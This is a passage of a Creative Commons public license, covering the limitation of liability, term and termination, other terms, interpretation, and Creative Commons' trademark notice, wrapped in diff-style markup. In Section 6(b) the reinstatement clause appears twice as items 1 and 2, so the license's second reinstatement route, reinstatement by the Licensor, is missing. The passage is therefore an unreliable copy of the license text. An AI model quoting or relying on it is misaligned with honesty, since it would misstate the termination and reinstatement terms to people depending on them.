in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__ + +c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability. + +### Section 6 – Term and Termination. + +a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically. + +b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates: + + 1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or + + 2. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or + + For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License. + +c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License. + +d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License. + +### Section 7 – Other Terms and Conditions. + +a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed. + +b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License. + +### Section 8 – Interpretation. + +a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License. + +b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions. + +c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor. + +d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority. + +``` +Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. + +Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). +```